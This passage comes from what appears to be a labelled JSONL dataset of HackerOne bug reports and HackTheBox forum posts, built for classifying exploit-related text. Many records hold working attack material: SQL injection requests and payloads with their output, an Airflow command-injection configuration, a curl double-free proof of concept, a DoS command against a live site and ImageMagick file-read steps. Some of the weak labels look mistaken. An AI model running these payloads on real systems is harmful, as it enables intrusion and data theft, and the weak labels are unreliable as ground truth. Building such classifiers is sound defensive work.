higher-privileged user into editing the post.\n- Wait for a higher-privileged user viewing the task. The user will see the file attachment resolve normally, edit the task and fix the formatting error. Nothing will indicate that a private file has been made public.\n- After the user has edited the post, the file will be available to the lower-privileged user.\n\n## Impact\n\ndisclosure of private file attachments when a user with access to the attachment edits a post of a user without access to it.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8986e2059016838d851b", "text": "[SQL Injection] Unauthenticated SQL Injection at █████████ [HtUS]\n\n## Summary\nHi team, I found Unauthenticated SQL Injection at ██████. Because of non-filter and non-escape input at API /api/organizations/*, attacker can inject malicious payload after single quote (') to exploit and extract database.\n\n## Step to Reproduce:\n\nExecute Request\n```\nGET /api/organizations/0010jdlwix09k'or(extractvalue(rand(),concat(0x3a,(select+user()))))=1--%20aa HTTP/1.1\nHost: ████ \nUser-Agent: Mozilla/5.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 \nAccept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 \nAccept-Encoding: gzip, deflate \nUpgrade-Insecure-Requests: 1 \nSec-Fetch-Dest: document \nSec-Fetch-Mode: navigate \nSec-Fetch-Site: none \nSec-Fetch-User: ?1 \nTe: trailers\n\n\n\n```\n\n\nThen the response is \n\n```\nHTTP/1.1 500 Internal Server Error\nContent-Type: application/json; charset=utf-8\nContent-Length: 209\nCross-Origin-Embedder-Policy: require-corp\nCross-Origin-Opener-Policy: same-origin\nCross-Origin-Resource-Policy: same-origin\nX-DNS-Prefetch-Control: off\nExpect-CT: max-age=0\nX-Frame-Options: SAMEORIGIN\nX-Download-Options: noopen\nX-Content-Type-Options: nosniff\nOrigin-Agent-Cluster: ?1\nX-Permitted-Cross-Domain-Policies: none\nReferrer-Policy: no-referrer\nX-XSS-Protection: 0\nStrict-Transport-Security: max-age=31536000\nExpires: Tue, 05 Jul 2022 04:12:11 GMT\nCache-Control: max-age=0, no-cache, no-store\nPragma: no-cache\nDate: Tue, 05 Jul 2022 04:12:11 GMT\nConnection: keep-alive\n\n{\"statusCode\":500,\"code\":\"P2010\",\"error\":\"Internal Server Error\",\"message\":\"\\nInvalid `prisma.queryRaw()` invocation:\\n\\n\\n Raw query failed. Code: `1105`. Message: `XPATH syntax error: ':█████████'`\"}\n```\n\n\nThe result was leaked by SQL XPATH Error, so we get user() = ████████\n\nChange query to version() we get version = 8.0.23\nhttps://██████/api/organizations/0010jdlwix09k'or(extractvalue(rand(),concat(0x3a,(select+version()))))=1--%20aa\n\nChange query to version() we get database = ███\nhttps://███/api/organizations/0010jdlwix09k'or(extractvalue(rand(),concat(0x3a,(select+database()))))=1--%20aa\n\n█████████\n██████████\n███\nTo extract data, we use this requests\n```\nGET /api/organizations/'or(extractvalue(1,concat(1,(select(table_name)from%20information_schema.tables%20limit%2054,1))))=' HTTP/1.1\nHost: ████ \nUser-Agent: Mozilla/5.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 \nAccept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 \nAccept-Encoding: gzip, deflate \nUpgrade-Insecure-Requests: 1 \nSec-Fetch-Dest: document \nSec-Fetch-Mode: navigate \nSec-Fetch-Site: none \nSec-Fetch-User: ?1 \nTe: trailers\n\n\n```\n\n█████\n\n## Impact\n\nAttacker can extract database from server █████", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-10-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e7c79dfc3181145f8076", "text": "[Unknown] Yet another SSRF query for Javascript\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b30b11bcefce1c873094", "text": "[Information Disclosure] Notification implicit PendingIntent in com.nextcloud.client allows to access contacts\n\nWhen the victim downloads files in nextcloud.A notification will be triggered. The content of the notification is \"Downloaded\".This notification is used to remind the user that the download is complete.The pendingintent in this notification is an implicit intent.\n\nAt this time a malicious app with \"BINDNOTIFICATIONLISTENER_SERVICE\" permission can get the pendintent of this notification, because it is an implicit pendintent. Therefore, the malicious app can set the \"packageName\" and \"clipdata\" of this pendintent. At this time, the malicious application will inherit the permissions of \"com.nextcloud.client\".Because nextcloud has contacts permissions. Therefore, malicious applications can read the contacts without applying for the contacts permission.\n{F1262742}\nAt the same time, because of the path configuration of fileprovider, the log file in the nextcloud app directory can also be read\n{F1262743}\n\nThe code of this implicit pendingintent is in\n\"com.owncloud.android.files.services.FileDownloader.notifyDownloadResult(com.owncloud.android.operations.DownloadFileOperation, com.owncloud.android.lib.common.operations.RemoteOperationResult) : void\"\n{F1262747}\n\nSteps To Reproduce:\npackageName:com.nextcloud.client\nversionName:3.15.1\nphone:pixel3\nAndroidVersion:10\n\n1.install and run \"poc.apk\"\n2.click the button to give the \"BINDNOTIFICATIONLISTENER_SERVICE\" permission to poc\n3.install \"com.nextcloud.client.apk\" and give contacts permission to nextcloud.\n4.Download a file as shown in the video.At this time, the victim's app will trigger a notification\n5.run \"adb logcat | grep sbn\". now you can see the contact stolen by the attacker\n\nSupporting Material/References:\n1.read contacts poc video\n{F1262750}\n\n2.poc.apk\n{F1262748}\n\n3.\"com.nextcloud.client.apk\"\n{F1262746}\n\n## Impact\n\nAny application with notification permission can steal contacts without apply for the contacts permission\nTo fix this vulnerability, please set the flag of pengingintent to FLAG_IMMUTABLE", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ee7e6c8d19b24af0454e", "text": "[Uncontrolled Resource Consumption] WordPress application vulnerable to DoS attack via wp-cron.php\n\n**Description:**\nHi team,\n\nThe WordPress application is vulnerable to a Denial of Service (DoS) attack via the wp-cron.php script. This script is used by WordPress to perform scheduled tasks, such as publishing scheduled posts, checking for updates, and running plugins.\n\nAn attacker can exploit this vulnerability by sending a large number of requests to the wp-cron.php script, causing it to consume excessive resources and overload the server. This can lead to the application becoming unresponsive or crashing, potentially causing data loss and downtime.\n\nI found this vulnerability at https://████████ endpoint.\n\n## References\n\nhttps://developer.wordpress.org/plugins/cron/\n\n## Impact\n\nA successful attack on this vulnerability can result in the following consequences:\n\n - Denial of Service (DoS) attacks, rendering the application unavailable.\n - Server overload and increased resource usage, leading to slow response times or application crashes.\n - Potential data loss and downtime.\n\n## System Host(s)\n██████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1. Get the doser.py script at https://github.com/Quitten/doser.py\n2. Use this command to run the script:\n```\npython3 doser.py -t 999 -g 'https://█████/wp-cron.php'\n```\n3. Go to https://████ after 1000 requests of the doser.py script.\n4. The site returns code 502.\n5. See the video PoC.\n\n## Suggested Mitigation/Remediation Actions\nTo mitigate this vulnerability, it is recommended to disable the default WordPress wp-cron.php script and set up a server-side cron job instead.\nHere are the steps to disable the default wp-cron.php script and set up a server-side cron job:\n\n 1. Access your website's root directory via FTP or cPanel File Manager.\n 2. Locate the wp-config.php file and open it for editing.\n 3. Add the following line of code to the file, just before the line that says \"That's all, stop editing! Happy publishing.\":\n```\ndefine('DISABLE_WP_CRON', true);\n```\n 4. Save the changes to the wp-config.php file.\n 5. Set up a server-side cron job to run the wp-cron.php script at the desired interval. This can be done using the server's control panel or by editing the server's crontab file.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "235ccdaf2192da0e980e", "text": "[Improper Access Control - Generic] Permissions policies can be bypassed via Module._load and require.extensions (High) (CVE-2023-30587)\n\n[https://hackerone.com/reports/1960870](https://hackerone.com/reports/1960870)\n\nThe use of `Module._load()` and `require.extensions[\".js\"]` can bypass the policy mechanism and require modules outside of the policy.json definition for a given module.\nThis vulnerability affects all users using the experimental policy mechanism in all active release lines: 16.x, 18.x and, 20.x.\n\n## Impact\n\nPermission policies limit a project to a specific set of authorized node js built-in modules. For example a project could attempt to limit the use of child_process which could be bypassed leading to remote code execution.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2023-30587"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-11-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f092580bee4f86f4f2d2", "text": "[Cross-Site Request Forgery (CSRF)] CSRF protection on OIDC login is broken\n\nTo protect against CSRF the \"state\" is used in the OIDC flow. On callback this code is verified against the code stored in the session for that user. However in case the token does not match a JSON response is provided that includes the expected state. Thus making it trivial for the attacker to obtain the correct state.\n\nJudging from the code it clearly seem to be debug leftovers https://github.com/nextcloud/user_oidc/blob/main/lib/Controller/LoginController.php#L336-L344\n\nFixing the todo there should mitigate the issue and ensure the OIDC flow is more secure.\n\n\nI didn't test ID4ME. But the code is almost identical. So I assume the bug is also the same https://github.com/nextcloud/user_oidc/blob/main/lib/Controller/Id4meController.php#L175-L181\n\n## Impact\n\nThe CSRF protection provided with the state is practically useless now.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "61a07748bcc28f4ea974", "text": "[Improper Input Validation] CVE-2023-25692: Apache Airflow Google Provider: Google Cloud Sql Provider Denial Of Service and Remote Command Execution\n\n## 0x01 Environment\n\n- airflow 2.5.1\n- apache-airflow-providers-google 8.8.0\n- Build with docker compose\n\n## 0x02 Reproduction Steps\n### 2.1 Create a malicious Google Cloud SQL Database connection\nCreate the following Google Cloud SQL Database connection named **aaa** under the Admin->Connections menu.Among them, Host, Schema, Login, and Port are required, just fill in the content that conforms to the format.\n\n{F2213508}\nThe actual content filled in **Extra** field is as follows. Note that **sql_proxy_version** must be similar to `?a=`, and the value of **sql_proxy_binary_path** is set to the command to be executed. Fill in 'whoami' here.\n```python\n{\n \"project_id\":\"pivotal-gearing-375804\",\n \"instance\":\"hellopg\",\n \"location\":\"us-central1-b\",\n \"database_type\":\"postgres\",\n \"use_proxy\":\"True\",\n \"use_ssl\":\"False\",\n \"sql_proxy_use_tcp\":\"True\",\n \"sql_proxy_version\":\"?a=\",\n \"sql_proxy_binary_path\":\"whoami\",\n \"sslcert\":\"\",\n \"sslkey\":\"\",\n \"sslrootcert\":\"\"\n}\n```\n\n### 2.2 Use the CloudSQLExecuteQueryOperator operator in the DAG for verification\nCreate a google_test.py script that uses the CloudSQLExecuteQueryOperator operator, and put it in the `/opt/airflow/dags` directory in the background so that it can be automatically loaded by airflow. The content is as follows, where **gcp_cloudsql_conn_id** is set to the connection name we established above **aaa**\n\n```python\nfrom __future__ import annotations\n\nimport os\nimport subprocess\nfrom datetime import datetime\nfrom os.path import expanduser\nfrom urllib.parse import quote_plus\n\nfrom airflow import models\nfrom airflow.providers.google.cloud.operators.cloud_sql import CloudSQLExecuteQueryOperator\n\n\nSQL = [\n \"CREATE TABLE IF NOT EXISTS TABLE_TEST (I INTEGER)\",\n \"CREATE TABLE IF NOT EXISTS TABLE_TEST (I INTEGER)\", # shows warnings logged\n \"INSERT INTO TABLE_TEST VALUES (0)\",\n \"CREATE TABLE IF NOT EXISTS TABLE_TEST2 (I INTEGER)\",\n \"DROP TABLE TABLE_TEST\",\n \"DROP TABLE TABLE_TEST2\",\n]\n\n\npostgres_kwargs = dict(\n user=\"postgres\",\n password=r\"ktd2(%EzQ5\",\n public_port=\"5432\",\n public_ip=\"34.122.52.6\",\n project_id=\"pivotal-gearing-375804\",\n location=\"us-central1-b\",\n instance=\"hellopg\",\n database=\"postgres\",\n client_cert_file=\"key/postgres-client-cert.pem\",\n client_key_file=\".key/postgres-client-key.pem\",\n server_ca_file=\".key/postgres-server-ca.pem\",\n)\n\n\n# Postgres: connect via proxy over TCP\nos.environ[\"AIRFLOW_CONN_PROXY_POSTGRES_TCP\"] = (\n \"gcpcloudsql://{user}:{password}@{public_ip}:{public_port}/{database}?\"\n \"database_type=postgres&\"\n \"project_id={project_id}&\"\n \"location={location}&\"\n \"instance={instance}&\"\n \"use_proxy=True&\"\n \"sql_proxy_use_tcp=True\".format(**postgres_kwargs)\n)\n\nconnection_names = [\n \"proxy_postgres_tcp\",\n]\n\nwith models.DAG(\n dag_id=\"example_gcp_sql_query\",\n start_date=datetime(2021, 1, 1),\n catchup=False,\n tags=[\"example\"],\n) as dag:\n prev_task = None\n\n\n task = CloudSQLExecuteQueryOperator(\n gcp_cloudsql_conn_id=\"aaa\",gcp_conn_id=\"proxy_postgres_tcp\",task_id=\"example_gcp_sql_task_proxy_postgres_tcp\" , sql=SQL\n )\n\n# [END howto_operator_cloudsql_query_operators]\n```\nEnable the** example_gcp_sql_query** DAG corresponding to our **google_test.py** script in the UI management interface, and run.\nClick to view the running graph and logs through the Graph menu.\n{F2213514}\nIt can be seen from the log that the victim machine executed the malicious parameter 'whoami' we constructed.\n{F2213518}\n### 2.3 Other methods for remote command execution through directory traversal\n#### 2.3.1 Construct Malicious DAG\nPlace our malicious dag via Google Cloud Starage at [https://storage.googleapis.com/swordlight/load_my_evil_dag.py](https://storage.googleapis.com/swordlight/load_my_evil_dag.py) .The content is as follows:\n```python\nfrom __future__ import annotations\n\nimport pendulum\n\nfrom airflow import DAG\nfrom airflow.decorator", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2023-25692"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "821e82c35aa6a669bfd4", "text": "[Double Free] CVE-2023-27537: HSTS double-free\n\n## Summary:\nWhen processing HSTS with multi-threading, double-free or UAF may occur due to lack of exclusion control.\nHSTS entries disappear when they expire or when \"max-age=0\" is received.\nIn this case, the offending entry is removed from the internal memory list, freeing memory but not exclusivity control.\nTherefore, depending on the timing, other threads may perform the operation, resulting in double-free or UAF.\n\n`lib/hsts.c` in the function `Curl_hsts_parse` on lines 213-221\n```\n if(!expires) {\n /* remove the entry if present verbatim (without subdomain match) */\n sts = Curl_hsts(h, hostname, FALSE);\n if(sts) {\n Curl_llist_remove(&h->list, &sts->node, NULL);\n hsts_free(sts);\n }\n return CURLE_OK;\n }\n```\n\nIf multiple threads process `hsts_free(sts);` at the same time, it becomes double-free.\nAnother problem is that UAF occurs when other threads access entries.\n\nLines 270-275 have a similar problem.\n\n## Steps To Reproduce:\n\n 1. [Prepare the following php.]\n```\n\n#define HAVE_STRUCT_TIMESPEC // [Add] \n#include \n#include \n\n#define NUMT 100\n\nconst char* const url = \"https://test.local/poc.php\";\n\npthread_mutex_t lock[9];\n\nstatic void lock_cb(CURL* handle, curl_lock_data data,\n curl_lock_access access, void* userptr)\n{\n pthread_mutex_lock(&lock[data]); /* uses a global lock array */\n}\n\nstatic void unlock_cb(CURL* handle, curl_lock_data data,\n void* userptr)\n{\n pthread_mutex_unlock(&lock[data]); /* uses a global lock array */\n}\n\nstatic void* pull_one_url(void* shobject)\n{\n CURL* curl;\n\n for (int i = 0; i < 100; i++) {\n curl = curl_easy_init();\n curl_easy_setopt(curl, CURLOPT_URL, url);\n curl_easy_setopt(curl, CURLOPT_HSTS, \"c:\\\\home\\\\hsts.txt\");\n curl_easy_setopt(curl, CURLOPT_SHARE, shobject);\n curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);\n curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);\n curl_easy_perform(curl); /* ignores error */\n curl_easy_cleanup(curl);\n }\n\n return NULL;\n}\n\nint main(int argc, char** argv)\n{\n pthread_t tid[NUMT] = {0};\n int i;\n\n for(i = 0;i<=9;i++)\n pthread_mutex_init(&lock[i], NULL);\n \n /* Must initialize libcurl before any threads are started */\n curl_global_init(CURL_GLOBAL_ALL);\n CURLSH* shobject = curl_share_init();\n curl_share_setopt(shobject, CURLSHOPT_SHARE, CURL_LOCK_DATA_HSTS);\n curl_share_setopt(shobject, CURLSHOPT_LOCKFUNC, lock_cb);\n curl_share_setopt(shobject, CURLSHOPT_UNLOCKFUNC, unlock_cb);\n for (i = 0; i < NUMT; i++) {\n int error = pthread_create(&tid[i],\n NULL, /* default attributes please */\n pull_one_url,\n (void*)shobject);\n if (0 != error)\n fprintf(stderr, \"Couldn't run thread number %d, errno %d\\n\", i, error);\n else\n fprintf(stderr, \"Thread %d, gets %s\\n\", i, url);\n }\n\n /* now wait for all threads to terminate */\n for (i = 0; i < NUMT; i++) {\n pthread_join(tid[i], NULL);\n fprintf(stderr, \"Thread %d terminated\\n\", i);\n }\n curl_share_cleanup(shobject);\n curl_global_cleanup();\n return 0;\n}\n\n```\nThe source was referred to under docs/examples.\n\nSupplement.\nURL is https://test.local/poc.php.\nphp that randomly memorizes and deletes HSTS entries.\nIt's hard to reproduce if it's random, but I've confirmed that the problem will occur.\nI attach an image of when the UAF happened(I tried in debug build).\nThe number of threads and the number of loops are increased in order to raise the possibility that the phenomenon will occur.\n{F2216003}\n\n## Impact\n\nDouble-free", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2023-27537"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0cc67b6ce28568d4bf30", "text": "I do not want to spoil here. You can DM me if you still need help.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-02-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3924a877eead428c6ab0", "text": "[Insecure Direct Object Reference (IDOR)] IDOR in Stats API Endpoint Allows Viewing Equity or Net Profit of Any MT Account\n\nHi Team,\n\nToday I logged into my Exness PA and noticed an updated performance [page](https://my.exness.com/pa/performance/summary). I thought to give it a quick check and noticed that the API endpoints responsible for fetching the stats performance chart (```*/stats/*```) is vulnerable to IDOR via `accounts=` parameter. The issue allows fetching the stats of any MT account and discloses the account equity / net profit of the corresponding account.\n\n#Vulnerable Endpoints\n```\nhttps://my.exness.com/v3/personal_area/stats/net_profit?time_range=365&accounts={accountNumber}\nhttps://my.exness.com/v3/personal_area/stats/orders_number?time_range=365&accounts={accountNumber}\nhttps://my.exness.com/v3/personal_area/stats/trading_volume?time_range=365&accounts={accountNumber}\nhttps://my.exness.com/v3/personal_area/stats/equity?time_range=365&accounts={accountNumber}\n```\n\n#Steps to Reproduce\n```\nGET /v3/personal_area/stats/equity?time_range=365&accounts=xxx HTTP/2\nHost: my.exness.com\nAuthorization: Bearer xyz\nContent-Type: application/json\n```\n\n\n#Proof of Concept\n\n███████\n\n## Impact\n\nIDOR allows stats of any MT trading account. The stats includes account net profit, closed order counts, trading volumes and daily equity figures.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-05", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7191aa342cf789de9f40", "text": "I didn’t find a correct solution, but read the flag using the ‘-b’ switch for a server script that uses ‘mv’. Hack the planet haha Ok.Got it. little hint, not directly solution: ‘((ob))’, yes, I know, but it’s not you think it is. Change something and fill in between the brackets and be sure to use money for it.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-01-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4a9d148588885be5fc8a", "text": "[Uncontrolled Resource Consumption] CVE-2022-27781: CERTINFO never-ending busy-loop\n\n## Summary:\nCurl is prone to a DoS attack in case the NSS TLS library is used and the CERTINFO option is enabled. Using maliciously crafted certificates on a server, an attacker can make curl run into an endless loop when connecting to the server. The bug is located in the following code segment (https://github.com/curl/curl/blob/master/lib/vtls/nss.c#L1014):\n\n```\n/* Count certificates in chain. */\nint i = 1;\nnow = PR_Now();\nif(!cert->isRoot) {\n cert2 = CERT_FindCertIssuer(cert, now, certUsageSSLCA);\n while(cert2) {\n i++;\n if(cert2->isRoot) {\n CERT_DestroyCertificate(cert2);\n break;\n }\n cert3 = CERT_FindCertIssuer(cert2, now, certUsageSSLCA);\n CERT_DestroyCertificate(cert2);\n cert2 = cert3;\n }\n}\n```\n\nWhen CERTINFO is set, display_conn_info() executes the above shown code, which tries to count the certificates in the chain received from servers via TLS. To this end, display_conn_info() starts with the leaf certificate and attempts to find its issuer certificate in the chain. The issuer certificate then becomes the origin for the next iteration. This step is repeated until there either is no issuer certificate or a root (= self-signed) certificate is found. However, if the received certificate chain contains a loop, this exit condition is never reached and display_conn_info() runs into an endless loop. To craft a loop, it is sufficient to have two CA certificates that mutually list each other as issuers (see attached PoC).\n\n## Steps To Reproduce:\n\nI have implemented a small PoC where a Webserver uses a maliciously crafted certificate chain that contains a loop. To this end, the end-entity certificate for localhost is issued by CA2, whose certificate is issued by CA1, whose certificate in turn is issued by CA2 (-> loop). The Python script for the Webserver and the certificate chain are attached to this report. To trigger the DoS in curl, the following steps need to be executed:\n\n 1. Modify URL in certinfo example (https://github.com/curl/curl/blob/master/docs/examples/certinfo.c#L46) to point to `https://localhost:4443/` instead of `https://www.example.com/` (`url_easy_setopt(curl, CURLOPT_URL, \"https://localhost:4443/\")`)\n 1. Build curl with NSS TLS library (./configure --with-nss) and with examples (make examples)\n 1. Execute python script attached to this report to start the attacker's Webserver\n 1. Execute certinfo (doc/examples/certinfo)\n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n * https_server.py (poc webserver)\n * key.pem (poc webserver key)\n * combined_loop.pem (poc webserver certificate chain)\n\n## Impact\n\nAn attacker who controls a server that a libcurl-using application (with NSS and enabled CERTINFO) connects to, can trigger a DoS. In this case, the application runs into an infinite loop and consumes nearly 100% CPU.\n\nUsing the CVSS calculator, I initially came up with medium severity (5.3). However, because the vulnerabilities relies on CERTINFO being enabled and NSS being used, which is not that popular and will soon be deprecated (https://curl.se/dev/deprecate.html), I eventually estimate the severity to be low.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-27781"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "fb3c34396f9df370f1d2", "text": "Hello. I’m still a newbie at this. However, I tried what you suggested in your answer. I used dig and identified the subdomains which allowed zone transfer. I enumerated the subdomains that don’t allow zone transfer. And yet, I am still lost and couldn’t figure out the solution to this question. Any more hints would be helpful since I feel frustrated and lost and spent too much time on this problem. thanks", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-02-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b0a69a40f464e4898476", "text": "[Unknown] Broken links make users from France unable to understand the allowed content policy\n\nHello, Reddit!\nI hope you are okay in there.\nFirst of all, I want to say one thing, maybe you will not appreciate this report, but at least this report can help users from France to understand the content policy of Reddit, so that if you fix this problem, users from France will understand the policy properly.\n\nWhich content is allowed, and which is not.\n\nEven though I'm not from France, I thought it wouldn't hurt me to report this.\n\nReproduction step:\n• Visit https://www.redditinc.com/fr/policies/moderator-guidelines (In French)\n• Scroll and see \"You are required to comply with our Content Policy\", you can click that\n• You will be redirected to a 404 page\n\n## Impact\n\nMaybe it's not a serious vulnerability, but at least you fixed it.\nUsers who are from France will not know what content rules they can create and what content rules they can't create.\n\nI read that Reddit requires each of its users to comply with their content policies, but if the page for a French user is 404, they won't understand it, and maybe if the user is breaking the law by posting something very fatal, they can evade in court.\n\nFor example saying \"REDDIT doesn't make any content policy rules\".\n\nMaybe it's weird, but at least if you fix this, there won't be any weird problems like that.\n\n\nBest Regards.\nArdyan Vicky Ramadan.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b0ffb94fe9705ab67af0", "text": "[Cross-site Scripting (XSS) - Stored] XSS in Widget Review Form Preview in settings\n\n## Summary:\nHi team,\n\nI found a XSS vulenrability in the widget review form preview. The payload is added in the success message and triggers when you preview the form\n\n## Steps To Reproduce:\n\n 1. Login to your Shopify account and open Judge.Me App\n 1. Go to 'Settings' -> 'Review Widget' -> 'Widget Form'\n 1. Go the the success message and add this XSS payload to the text: \">\n 1. Click Preview to trigger the XSS\n 1. Save the changes and now every time someone preview the form XSS would trigger\n\n{F1763124}\n\n## Supporting Material/References:\n{F1763127}\n\nAdmin can invite Staff user with limited permission, that staff can then add the payload and perform scripts to other users like the Admin.\n\nIf there's anything I can help with please let me know.\n\nHave a great day!\n\nCheers,\nPenguinsHelp\n\n## Impact\n\nStored XSS", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "04b3f894ad34cb62d066", "text": "[Remote File Inclusion] [CVE-2022-44268] Arbitrary Remote Leak via ImageMagick\n\n**Summary:**\nHackerOne's image upload is using ImageMagick to convert/resize images and is likely updated. Thus, it's vulnerable to CVE-2022-44268.\n\n**Description:**\n\n\n### Steps To Reproduce\n1. Navigate to your profile\n2. Edit and upload the attached image (`im-lfi.png`) as your profile picture\n3. Save changes and download the resized picture\n4. Issue the following command to view the downloaded image's profile data;\n```bash\nidentify -verbose image.png\n```\nThen, copy the `Raw profile type:` and decode it using any tool or using Python like;\n```bash\npython -c \"print(bytes.fromhex('2c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c6f67696e0a').decode())\"\n```\n\nI've attached the resized image too which contains the content of /etc/passwd i.e. 86bca9490b71a481329efc85de3a82a98f6c29475f4926fd2b5fc844b96899c0.png\n\n## Impact\n\nArbitrary Remote Leak", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2022-44268"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "39ff29059e406a855f5c", "text": "[SQL Injection] SQL Injection in version 1.4.3 and below\n\n## Summary:\nSQL Injection in ImpressCMS v1.4.3 and earlier allows remote attackers to inject into the code in unintended way, this allows an attacker to read and modify the sensitive information from the database used by the application. If misconfigured, an attacker can even upload a malicious web shell to compromise the entire system.\n\n## ImpressCMS branch :\n[1.4]\n## Browsers Verified In:\n\n Google Chrome, Firefox]\n\n## Steps To Reproduce:\nStep1- Login with Admin Credentials\nStep2- Vulnerable Parameter to SQLi: mimetypeid (POST request):\n\nPOST /ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1 HTTP/1.1\nHost: 192.168.56.117\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form-data; boundary=---------------------------40629177308912268471540748701\nContent-Length: 1011\nOrigin: http://192.168.56.117\nConnection: close\nReferer: http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1\nCookie: tbl_SystemMimetype_sortsel=mimetypeid; tbl_limitsel=15; tbl_SystemMimetype_filtersel=default; ICMSSESSION=7c9f7a65572d2aa40f66a0d468bb20e3\nUpgrade-Insecure-Requests: 1\n\n-----------------------------40629177308912268471540748701\nContent-Disposition: form-data; name=\"mimetypeid\"\n\n1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE)\n-----------------------------40629177308912268471540748701\nContent-Disposition: form-data; name=\"extension\"\n\nbin\n-----------------------------40629177308912268471540748701\nContent-Disposition: form-data; name=\"types\"\n\napplication/octet-stream\n-----------------------------40629177308912268471540748701\nContent-Disposition: form-data; name=\"name\"\n\nBinary File/Linux Executable\n-----------------------------40629177308912268471540748701\nContent-Disposition: form-data; name=\"icms_page_before_form\"\n\nhttp://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype\n-----------------------------40629177308912268471540748701\nContent-Disposition: form-data; name=\"op\"\n\naddmimetype\n-----------------------------40629177308912268471540748701\nContent-Disposition: form-data; name=\"modify_button\"\n\nSubmit\n-----------------------------40629177308912268471540748701--\n\nVulnerable Payload:\n1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE) //time-based blind (query SLEEP)\n\nOutput:\nweb application technology: Apache 2.4.52, PHP 7.4.27\nback-end DBMS: MySQL >= 5.0.12 (MariaDB fork)\navailable databases [6]:\n[*] impresscms\n[*] information_schema\n[*] mysql\n[*] performance_schema\n[*] phpmyadmin\n[*] test\n\n## Suggestions to mitigate or resolve the issue:\nUse Parameterized Queries\n\n## Supporting Material/References:\nhttps://github.com/sartlabs/0days/blob/main/ImpressCMS1.4.3/Exploit.txt\n\n * [attachment / reference]\n\n## Impact\n\nSQL Injection in ImpressCMS v1.4.3 and earlier allows remote attackers to inject into the code in unintended way, this allows an attacker to read and modify the sensitive information from the database used by the application. If misconfigured, an attacker can even upload a malicious web shell to 